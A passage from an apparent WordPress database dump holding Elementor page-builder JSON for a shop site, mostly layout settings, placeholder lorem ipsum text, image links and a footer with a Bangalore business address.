Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8358,1468,'_elementor_page_assets','a:0:{}'),(8360,1469,'_elementor_edit_mode','builder'),(8361,1469,'_elementor_template_type','wp-page'),(8362,1469,'_elementor_version','3.7.7'),(8363,1469,'_wp_page_template','elementor_canvas'),(8364,1469,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8365,1469,'_elementor_page_assets','a:0:{}'),(8367,1470,'_elementor_edit_mode','builder'),(8368,1470,'_elementor_template_type','wp-page'),(8369,1470,'_elementor_version','3.7.7'),(8370,1470,'_wp_page_template','elementor_canvas'),(8371,1470,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 